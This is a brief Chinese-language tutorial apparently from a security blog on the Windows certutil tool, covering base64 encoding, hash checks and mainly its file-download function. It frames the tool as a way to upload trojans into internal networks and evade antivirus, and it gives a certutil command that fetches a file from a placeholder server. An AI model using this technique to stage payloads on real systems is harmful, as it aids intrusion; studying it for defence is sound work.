知道这个工具还是在一篇文章中提到内网环境上传木马时可以通过这个工具,稳稳当当。
工具介绍
certutil是windows下一款下载文件的工具,自从WindowsServer2003就自带,但是在Server 2003使用会有问题,也就是说,以下命令是在Win7及其以后的机器中使用。其功能可校验文件MD5,SHA1,SHA256,下载恶意文件和免杀。
图片.png
功能使用
看图就懂,base64的编码解码(十六进制也行,未演示),校验文件的哈希值。
图片.png
重点学习下载功能
首先先在服务器上新建两个测试文件,然后使用python起一个http服务:
图片.png
使用命令:
certutil.exe -urlcache -split -f http://x.x.x.x:8000/test.txt
成功下载,有意思的是如果没有找到这个文件也会创建一个同名文件:
图片.png
网友评论